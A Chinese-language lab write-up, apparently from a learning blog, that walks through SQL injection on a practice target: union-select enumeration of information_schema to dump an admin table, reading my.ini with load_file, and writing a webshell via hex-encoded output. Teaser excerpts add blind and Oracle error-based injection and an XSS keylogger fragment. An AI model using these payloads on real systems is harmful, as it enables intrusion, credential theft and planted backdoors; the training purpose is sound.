這是今天的任務
union select查詢語句 第一步是先構造閉合 加入單引號報錯 然後 更據and 1=1 and1=2看是字元型還是布林型注入
www.薩達所大大所多t/index.php?id=1%20order%20by%205
資料庫test查詢所有資料庫要求是讀取web埠的admin密碼 那我們應該進入test資料庫
爆表名
**+union select這裡原來的語句已經閉合 不需要你去閉合了1,2,3,4,table_name from information_schema.tables where table_schema='
test
'
看見有admin表之後繼續爆列名
看見有username 和password應該就是我們要爆破的欄位名 來爆破吧
這個應該就是我們要爆破的資料 admin admin888
0x02讀取靶機phpstudy裡面mysql的my.ini這個檔案
那有注入點 我們看看是否有讀寫檔案的許可權吶? 因為這裡的user()是root那我們就有讀取檔案的許可權了
1、必須有許可權讀取並且檔案必須完全可讀。
and (select count(*) from mysql.user)>0 /*如果結果返回正常,說明具有讀寫許可權.*/
and (select count(*) from mysql.user)>0 /* 返回錯誤,應該是管理員給資料庫賬戶降權了*/
2、欲讀取檔案必須在伺服器上
3、必須指定檔案完整的路徑
4、欲讀取檔案必須小於max_allowed_packet
如果該檔案不存在,或因為上面的任一原因而不能被讀出,函式返回空。比較難滿足的就是許可權。
在windows下,如果ntfs設定得當,是不能讀取相關的檔案的,當遇到administrators才能訪問的檔案,
users就不能實現用load_file讀取檔案了。
1.root許可權
2.gpc關閉(能使用單引號)
3.有絕對路徑(讀檔案可以不用,寫檔案必須)
4.沒有配置—secure-file-priv
那麼許可權夠了 路徑怎麼辦吶??????
兩個函式的介紹
@@datadir 讀取資料庫路徑
@@basedir mysql 獲取安裝路徑
這裡分享這個
那更據他的理解路徑應該是 e:\phpstudy\mysql\data\my.ini
那我們就具備讀檔案的許可權了
構造語句 這裡第一次構造的路徑是\乙個斜槓的 不知道為什麼不行 網上說兩個斜槓就好 我就去試了一下
成功讀取檔案
0x03寫入自己的webshell
那麼這個要滿足的條件就更多了
沒有配置—secure-file-priv這個是什麼東西吶?看看下面這個部落格
好咯 回歸正題
嘗試一下嘛先 管他配沒配置 但是一般這個網頁的路徑在**吶?
我們只是知道mysql的路徑的啊 提示告訴我們是phpstudy 我們看看自己的phpstudy mysql和www同目錄
那我們來嘗試一下吧
我的天 過濾了 那我們嘗試一下16進製制直接寫入吧
而且好像還把目錄報錯出來了
我們的目錄寫錯了應該是e:\phpstudy\www\sqli-one\
但是還是會報錯
跟著改就行
然後就會成功
致謝--- 卿哥
加油努力!!!
大哥帶我們的mysql注入 基於bool的盲注
盲注 那麼我們來了解一點盲注的語法 這裡面是語法的介紹 0x01第一步我們先判斷當前資料庫的長度 語法構造 index.php?id 1 20and 20length select 20database 3e3 正確 index.php?id 1 and length select database...
大哥帶的Orchel資料庫的報錯注入
0x01 使用報錯注入需要使用類似 1 報錯語句 1 報錯語句 使用比較運算子,這樣的方式進行報錯注入 mysql僅使用函式報錯即可 類似mssql報錯注入的方式。news.jsp?id 1 and 1 1 正確news.jsp?id 1 and 1 2 錯誤 存在注入 隨便輸入 發現存在報錯資訊我...
大哥帶的XSS練習
0x01反射型 可以看見什麼都沒有過濾 0x02儲存型xss 那麼可以看見也是成功了 那我們試試可不可以順著網線搞一下組員吶?算了 沒得伺服器 搞搞自己吧 document.onkeypress function evt key post key logfile keylog.txt fp fope...